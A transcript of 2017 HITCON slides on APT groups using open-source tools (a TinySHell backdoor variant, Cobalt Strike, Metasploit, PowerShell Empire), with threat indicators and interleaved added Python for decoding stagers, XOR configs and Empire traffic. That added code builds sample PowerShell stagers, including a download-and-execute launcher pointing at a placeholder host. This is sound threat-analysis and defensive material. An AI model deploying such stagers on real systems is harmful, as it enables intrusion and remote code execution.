Open Source as fuel of recent APT
TRANSCRIPT (slide text), HITCON (hitcon.org)
Dec 2017
Copyright © LAC Co., Ltd. All Rights Reserved.
Yoshihiro Ishikawa
Whoami?
Yoshihiro Ishikawa
• Organization: LAC
• Department: Cyber Counter Threat Team
• Job Title: Security Researcher, CISSP
• yoshihiro.ishikawa[at]lac.co.jp
Agenda
• Purpose
• Open Source Malware Targeting MacOS
• PowerShell Empire improperly used
• Prevention method
• Conclusion
Purpose
• Recently there are many APT attacks fueled by the use of open source tools and malware.
• Why?
  • Open source tools make attacks easier to carry out and give actors more capability.
  • Actors can anonymize their attacks behind widely used code, which makes attribution harder.
  • Actors usually modify the attack code and easily create new customized malware.
(Figure: logos of open source tools seen in APT attacks: PowerSploit, TinySHell, Koadic, QuasarRAT, mimikatz, Trochilus, Pupy, Nishang)
Purpose: APT groups with Open Source Tools
• APT10 (menuPass): PowerSploit, Koadic, QuasarRAT, Redleaves (Trochilus)
  • Public, Technology, Energy sectors, etc. (USA, Canada, UK, France, South Korea, Japan, etc.) [1]
• CloudyOmega (BlueTermite): mimikatz
  • Some companies, no specific trends (Japan)
• Tick (BRONZE BUTLER): mimikatz
  • Critical infrastructure and manufacturing (South Korea and Japan)
• PassCV / BARIUM (Winnti?) [2][3]: Metasploit, BeEF
  • Game makers (USA, China, Russia, South Korea, Taiwan and Japan)
• Unsure Group (APT10): PowerShell Empire
  • Political and academic sectors (Japan)
In this presentation, I will introduce the TTPs of PassCV and the Unsure Group confirmed in Japan in 2017.
CYBER - EDUCATION - PENTEST - JSOC - 119 - CONSULTING
We provide IT total solutions based on advanced security technologies.
Open Source Malware Targeting MacOS
Open source malware variant using TinySHell
• Identification (I picked only one case)
  • Hash: 0161317c5f4fb3901df63c6e88f60933
  • Type: Mach-O 64-bit Executable
  • Lang: C
  • Characteristics:
    • Developed with Xcode on macOS Sierra (10.12)
    • TinySHell original source code was used
    • No code signing
(Figure: file information and characteristic strings)
What about TinySHell
TinySHell is an open source backdoor that compiles on all POSIX variants [4][5]
• Functions
  • Remote shell execution
  • File upload
  • File download
• C2 communication
  • Protocol: TCP
  • Port: 22 (default)
  • Encryption: AES
  • Default key is "neversayneversaydie"
Comparison of similarities
(Figure: TinySHell source next to the malicious variant, showing the code that calls AES encryption and the code that calls the backdoor functions)
We can confirm that these codes are ALMOST identical.
The only notable change in the crypto path is the key: AES Key = "free&2015" instead of the TinySHell default.
Functions only in TinySHell variants
1. The malware configuration/setting file
• The setting information used by the malware is saved as a ".cache" file. This ".cache" file is read from a different PATH depending on the privilege the malware runs with (root, i.e. privileged user, or a normal user).
• The C2 information written in the ".cache" file is encrypted, and the malware decrypts the string using the XOR decoder function described in part "2. Decryption function".
(Figure: .cache file loading function for the root case and the user case; .cache fields: C2 domain, port, sleep time, forged process name)
2. Decryption function
XOR-decrypts the contents of .cache or the hard-coded strings in the malware.
(Figure: our decrypting script in Python and the decrypted strings)
3. Anti-analysis function and malicious environment setup
• A function to check whether "tcpdump" is running on the computer.
• Shell and MySQL commands are run with history disabled, so the operator's activity is not logged.
4. Create rootkit and be called from it (functions only in the Linux TinySHell variant)
• A rootkit ("rsakit") is created after the malware connects to the C2 server and receives a response.
• This rootkit is also a variant of an open source tool, the rtkit code [6].
• Rootkit functionality: to hide its own process or an arbitrary process.
(Figure: rootkit (rsakit) and the TinySHell variant)
Malware connection and related elements
• The IP address associated with the C2 server domain of the malware is 61.78.62[.]21.
• This IP was used by war[.]geekgalaxy[.]com.
• This domain is related to "PassCV" [7].
• Next, attention to another IP address, 106.184.5[.]252 [8].
(Figure: related elements: iisexit[at]gmail.com, 61.78.62.xxx, 106.184.5.xxx, job[.]yoyakuweb[.]technology, resume[.]immigrantlol[.]com)
How used for attacking
(Figure: attack flow)
• The beginning is a spear phishing e-mail.
• job[.]yoyakuweb[.]technology (with a User-Agent check) and resume[.]immigrantlol[.]com deliver the lure archives.
• Case Mac: info.zip contains Resume.app; the related C2 infrastructure includes a BeEF C2 and vps2java[.]securitytactics[.]com running the Metasploit Framework [9].
• Case Windows: info.zip contains Info.doc; other archives (xxxx.zip) contained Info.chm / Stefan_Info.doc / ...exe; the related C2 infrastructure includes appaffect[.]com running Cobalt Strike [10] and other C2 servers.
Case Windows: using CVE-2017-0199 exploit
• CVE-2017-0199 exploit: a decoy resume file is opened, and a malicious script is downloaded.
• The script is Base64 + gzip encoded and downloads the next payload.
Copyright©LACCo.,Ltd.AllRightsReserved.
Thiscodeisusingexec-sc.ps1ofDon'tKillMyCat(DKMC)[11]
(toolong,redacted)
Base64
ThiscodeisMetasploitshellcode
ThiscombinationusedattackCobaltStrikecalled"Beacon"
DecodedScript
CaseWindows:usingCVE-2017-0199exploit
17
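Added example (not the deck's script and not DKMC's code): a small Python unwrapper for the kind of stager described above. It peels the Base64 + gzip layer, finds the Base64 blob handed to [Convert]::FromBase64String in the inner script, and applies a heuristic for the Metasploit x86 stager prologue (cld; call, i.e. FC E8 xx 00 00 00) that Cobalt Strike's Metasploit-compatible Beacon stager also starts with. It assumes the stager uses the common GzipStream/FromBase64String one-liner; the sample stager and its placeholder "shellcode" bytes are constructed for the example.

```python
"""Added example: unwrap a Base64+gzip PowerShell stager and pull out its
shellcode blob. The stager built by build_sample_stager() is constructed;
the shellcode bytes are a placeholder prologue, not a working payload."""
import base64
import gzip
import re

# Matches [Convert]::FromBase64String('...') / ("...") and captures the blob.
B64_RE = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")


def unwrap_gzip_layers(script: str, max_depth: int = 5) -> str:
    """Replace the script with its decompressed inner script while the first
    FromBase64String blob is a gzip stream (magic 1f 8b). Stops as soon as the
    blob is not gzip, so a final shellcode blob is left untouched."""
    for _ in range(max_depth):
        m = B64_RE.search(script)
        if not m:
            return script
        raw = base64.b64decode(m.group(1), validate=True)
        if raw[:2] != b"\x1f\x8b":
            return script  # not a compression layer: shellcode or other data
        script = gzip.decompress(raw).decode("utf-8", errors="replace")
    raise ValueError("too many nested gzip layers")


def extract_shellcode(script: str) -> bytes:
    """Return the first FromBase64String blob of the (unwrapped) script as bytes."""
    m = B64_RE.search(script)
    if not m:
        raise ValueError("no FromBase64String blob found")
    return base64.b64decode(m.group(1), validate=True)


def looks_like_msf_x86_stager(sc: bytes) -> bool:
    """Heuristic only: Metasploit x86 Windows stagers begin with
    'cld; call block_api' = FC E8 xx 00 00 00. Not a signature."""
    return len(sc) > 6 and sc[0] == 0xFC and sc[1] == 0xE8 and sc[3:6] == b"\x00\x00\x00"


def analyze(stager: str) -> dict:
    """Unwrap the layers and summarize what was found."""
    inner = unwrap_gzip_layers(stager)
    sc = extract_shellcode(inner)
    return {
        "inner_script": inner,
        "shellcode_len": len(sc),
        "shellcode_head": sc[:6].hex(),
        "msf_stager_like": looks_like_msf_x86_stager(sc),
    }


def build_sample_stager() -> str:
    """Constructed sample in the shape of a Base64+gzip wrapped exec-sc style script."""
    fake_sc = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0" + b"\x90" * 16  # placeholder
    inner = (
        "$sc = [Convert]::FromBase64String('%s')\n"
        "# ... VirtualAlloc / CreateThread boilerplate omitted ...\n"
    ) % base64.b64encode(fake_sc).decode()
    outer_blob = base64.b64encode(gzip.compress(inner.encode())).decode()
    return (
        "IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream("
        "New-Object IO.MemoryStream(,[Convert]::FromBase64String('%s')),"
        "[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()" % outer_blob
    )


if __name__ == "__main__":
    result = analyze(build_sample_stager())
    print("shellcode bytes:", result["shellcode_len"], "head:", result["shellcode_head"])
    print("Metasploit-style stager prologue:", result["msf_stager_like"])
```

Run the recovered shellcode bytes through a shellcode emulator or an x86 disassembler rather than trusting the prologue check; the heuristic is there to triage, not to attribute.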
Case Windows: other attacking types
(Figure: two older delivery chains)
• Case chm (in 2014): the .chm file contains a malicious script; it is extracted and executed, downloads the next downloader, which drops and executes the Cobalt Strike Beacon payload.
• Case exe (in 2016): a decoy file is opened and the exe file executes, which downloads the next downloader and finally runs the Cobalt Strike Beacon payload.
Case Mac: using malicious jar file
• Info.zip contains an Application Bundle (Info.plist, JavaAppLauncher, Resume.jar); the bundle is code signed.
• Function of the launcher: read and execute the bundled Resume.jar. The launcher application itself is not malicious; it is similar to the AppBundler code [12].
Case Mac: using malicious jar file (decompiled Resume.jar)
(Figure: decompiled Resume.jar, config and decoy file)
• Reads the config (Flash.dat) and connects to the C2
• Saves and displays the decoy file
Case Mac: using malicious jar file (config and traffic)
• Flash.dat (config) fields: C2 domain, flag, port, sleep time
• The file content is encrypted with a 10-byte XOR key
• C2: vps2java[.]securitytactics[.]com
• The captured traffic is Meterpreter. It seems that the Metasploit Framework was running on the C2 server.
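Added example (not the deck's own decrypting script): a Python decoder for configuration blobs protected with a repeating-key XOR, as used by both the TinySHell variant's ".cache" file (part 2, Decryption function) and the Java dropper's Flash.dat with its 10-byte key. It decrypts, splits the result into the fields the slides list (C2 domain, port, sleep time, and the forged process name for .cache), and also shows known-plaintext key recovery: when the C2 hostname is already known from DNS or proxy logs, XORing it against the ciphertext yields the key. The key, the field layout and delimiter, and the sample config are constructed assumptions; the real samples' key bytes and layout are only shown as screenshots in the slides.

```python
"""Added example: repeating-key XOR config decoder for .cache / Flash.dat style
blobs. Key, layout ('host|port|sleep|process') and sample are constructed."""
import binascii
import re

# Constructed 10-byte key (assumption; the real keys are not reproduced here).
ASSUMED_KEY = b"\x13\x37\xde\xad\xbe\xef\x42\x99\x0a\x55"


def xor_decrypt(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR: byte i is XORed with key[i % len(key)].
    XOR is symmetric, so the same routine encrypts."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def parse_config(plaintext: bytes) -> dict:
    """Split the assumed 'host|port|sleep|process' layout into typed fields.
    Any decoding or field-count problem is reported as ValueError, which is
    what a wrong key normally produces."""
    fields = plaintext.rstrip(b"\x00").split(b"|")
    if len(fields) != 4:
        raise ValueError(f"unexpected field count {len(fields)} (wrong key?)")
    try:
        host, port, sleep, proc = (f.decode("ascii") for f in fields)
    except UnicodeDecodeError as exc:
        raise ValueError("non-ASCII after decryption (wrong key?)") from exc
    if not re.fullmatch(r"[A-Za-z0-9.-]+", host):
        raise ValueError("C2 host is not a plausible hostname")
    return {
        "c2_domain": host,
        "port": int(port),
        "sleep_time": int(sleep),
        "forged_process": proc,
    }


def recover_key(ciphertext: bytes, known_prefix: bytes, key_len: int) -> bytes:
    """Known-plaintext attack on repeating-key XOR: with key_len bytes of known
    plaintext at the start (e.g. the C2 hostname seen in DNS logs), the key is
    simply ciphertext XOR plaintext over those bytes."""
    if len(known_prefix) < key_len:
        raise ValueError("need at least key_len bytes of known plaintext")
    return bytes(c ^ p for c, p in zip(ciphertext[:key_len], known_prefix[:key_len]))


# Constructed sample: an encrypted config as it would look under the assumed key.
SAMPLE_PLAINTEXT = b"vps2java.securitytactics.com|443|60|kextd"
SAMPLE_CIPHERTEXT = xor_decrypt(SAMPLE_PLAINTEXT, ASSUMED_KEY)


def decrypt_config(ciphertext: bytes = SAMPLE_CIPHERTEXT, key: bytes = ASSUMED_KEY) -> dict:
    """Decrypt and parse a config blob; the defaults use the constructed sample."""
    return parse_config(xor_decrypt(ciphertext, key))


if __name__ == "__main__":
    print("ciphertext:", binascii.hexlify(SAMPLE_CIPHERTEXT).decode())
    print("config:", decrypt_config())
    # Recover the key from the first 10 bytes of a known C2 hostname.
    print("recovered key:", recover_key(SAMPLE_CIPHERTEXT, b"vps2java.s", 10).hex())
```

The key-recovery step is the practical point: a 10-byte repeating XOR key gives no real protection once a single C2 hostname of at least 10 characters is known, so the same decoder can be pointed at other samples from the campaign without reverse engineering each one.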
Attack is ongoing?
• This IP is PassCV infrastructure. Is a new spear phishing e-mail attack being launched?
• "eggagent[.]info" used 106.184.5[.]252 and now uses 139.162.95[.]39. It might be new attack infrastructure. (PassiveTotal [13], DomainTools [14])
• A resume is displayed when accessing the domain.
PowerShell Empire improperly used
What about PowerShell Empire
PowerShell Empire [15] is a post-exploitation framework mainly used in penetration tests and Red Team assessments.
(Figure: running PowerShell Empire)
PowerShell Empire: infection vector
• Target: a specific university organization
• Spear phishing e-mail, then access to a URL and ZIP file download
• The contents of the ZIP file are suspicious LNK files and RTF files
• The e-mail came from a specific account that had been hacked [16]
LNK/RTF file detail of 1st payload
• LNK: the LNK file executes MSHTA.exe, which calls PowerShell using the script in the downloaded HTA file
• RTF: RTF file with CVE-2017-0199 exploit
• This communication is on 443/TCP, but HTTP is used instead of HTTPS
HTA file detail of 2nd payload (case of LNK)
• Response data (HTA file): Base64-encoded PowerShell; this code is PowerShell Empire
• Displays decoy web pages
Persistence methods with PowerShell Empire
• Task Scheduler: the task program launches PowerShell
• Please check the "debug" registry value: its Base64-decoded string is the Empire script
Malware connection and related elements
• Both hosting companies provide web hosting service
• We can see "HTTP/1.0" and "Microsoft-IIS/7.5" in the HTTP response header
• This combination is what the Empire C2 server (listeners/http.py) returns. It was still running when checked in late August 2017.
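Added example (not Empire's code and not from the deck): two triage checks for the Empire indicators described in the persistence and connection slides above. decode_launcher() decodes a PowerShell "-enc" launcher (Base64 of a UTF-16LE script), which is the form Empire writes into the "Debug" registry value for its scheduled-task persistence, and extract_c2() pulls the C2 URL out of the decoded stager. fingerprint_response() flags an HTTP reply that carries the "HTTP/1.0" status line together with "Server: Microsoft-IIS/7.5", the pair the slides observed from Empire's default http listener. The launcher text, the $ser/$t variable names, the default request URIs and the sample HTTP response are assumptions based on Empire 2.x defaults and are constructed for this example.

```python
"""Added example: decode an Empire-style '-enc' launcher and fingerprint the
default Empire http listener response. Samples are constructed."""
import base64
import re
import shlex

# Assumed Empire 2.x default profile URIs (not stated in the deck).
EMPIRE_DEFAULT_URIS = ("/admin/get.php", "/news.php", "/login/process.php")

# powershell.exe accepts any unambiguous prefix of -EncodedCommand.
ENC_FLAG_RE = re.compile(r"^-(e|ec|enc|encodedcommand)$", re.IGNORECASE)
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?::\d{1,5})?")


def decode_launcher(cmdline: str) -> str:
    """Return the script behind a 'powershell ... -enc <b64>' command line.
    The payload is Base64 over UTF-16LE, not over UTF-8."""
    args = shlex.split(cmdline, posix=True)
    for i, arg in enumerate(args[:-1]):
        if ENC_FLAG_RE.match(arg):
            raw = base64.b64decode(args[i + 1], validate=True)
            if len(raw) % 2:
                raise ValueError("-enc payload has odd length, not UTF-16LE")
            return raw.decode("utf-16-le")
    raise ValueError("no -enc argument found")


def extract_c2(script: str) -> dict:
    """Pick the first http(s) URL and the $t request URI out of the decoded
    stager and note whether the URI is one of the assumed Empire defaults."""
    m_url = URL_RE.search(script)
    if not m_url:
        raise ValueError("no C2 URL in script")
    m_uri = re.search(r"\$t\s*=\s*['\"](/[^'\"]*)['\"]", script)
    uri = m_uri.group(1) if m_uri else None
    return {"server": m_url.group(0), "uri": uri, "default_uri": uri in EMPIRE_DEFAULT_URIS}


def fingerprint_response(raw: bytes) -> dict:
    """Parse the status line and headers of a raw HTTP response and flag the
    HTTP/1.0 + Microsoft-IIS/7.5 combination seen from Empire's http listener."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    status = lines[0]
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    server = headers.get("server", "")
    http10 = status.startswith("HTTP/1.0")
    return {"http10": http10, "server": server,
            "empire_like": http10 and server == "Microsoft-IIS/7.5"}


def build_sample_launcher(server: str = "http://203.0.113.10:80",
                          uri: str = "/login/process.php") -> str:
    """Constructed Empire-shaped launcher (real Empire stagers are much longer)."""
    script = ("$wc=New-Object System.Net.WebClient;$ser='%s';$t='%s';"
              "IEX ($wc.DownloadString($ser+$t))") % (server, uri)
    enc = base64.b64encode(script.encode("utf-16-le")).decode()
    return "powershell -noP -sta -w 1 -enc " + enc


# Constructed response in the shape the slides describe.
SAMPLE_RESPONSE = (b"HTTP/1.0 200 OK\r\nServer: Microsoft-IIS/7.5\r\n"
                   b"Content-Type: text/html\r\nContent-Length: 0\r\n\r\n")


if __name__ == "__main__":
    script = decode_launcher(build_sample_launcher())
    print("C2:", extract_c2(script))
    print("response fingerprint:", fingerprint_response(SAMPLE_RESPONSE))
```

Both checks are weak on their own (a real IIS 7.5 box can answer HTTP/1.0 requests, and any PowerShell launcher can use -enc), so they are meant as pivots: decode every scheduled task and registry value that launches PowerShell, then check what the extracted C2 host answers with.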
Prevention method
• Plenty of initial attack vectors are spear phishing e-mails.
  • Keep up to date with the latest systems, software and security products
  • Educate employees on potential security threats and on not opening unknown e-mail
• Take special care with recent exploit vectors (DDE, XLL Add-Ins, etc.) which have high potential to be used in attacks.
  • Disable DDE and XLL Add-Ins with Microsoft Office settings, etc. [17]
• PowerShell, HTA and CHM are often used in this series or similar threats.
  • Block PowerShell, HTA and CHM (powershell.exe, mshta.exe, hh.exe) with AppLocker or SRP, etc. [18][19]
• Attackers repeatedly use similar attack methods and almost the same infrastructure.
  • Utilize threat intelligence tools
Conclusion
• Recent APT attacks are heavily using open source tools and show an increasing tendency to modify the original source code so that they can target various platforms.
• The past evidence shows us that the attacks are continuing and still ongoing now.
• For information sharing with OPSEC on a global scale, you are more than welcome to contact us!
Thank you. Any Questions?
Reference
1. https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
2. https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies
3. https://blogs.technet.microsoft.com/mmpc/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-windows-defender-atp/
4. https://packetstormsecurity.com/files/31650/tsh-0.6.tgz.html
5. https://github.com/creaktive/tsh
6. https://github.com/ivyl/rootkit
7. https://www.bluecoat.com/zh-cn/security-blog/2014-07-21/korean-gaming-industry-still-under-fire
8. https://www.protectwise.com/post/winnti-evolution-going-open-source/
9. https://www.metasploit.com/
10. https://www.cobaltstrike.com/
11. https://github.com/Mr-Un1k0d3r/DKMC
12. https://bitbucket.org/infinitekind/appbundler
13. https://community.riskiq.com/
14. https://www.domaintools.com/
15. https://www.powershellempire.com/
16. https://www.jcer.or.jp/center/f.relationship_jp-us.html
17. https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
18. https://www.iij.ad.jp/en/company/development/iir/pdf/iir_vol32_infra_EN.pdf
19. https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/increased-use-of-powershell-in-attacks-16-en.pdf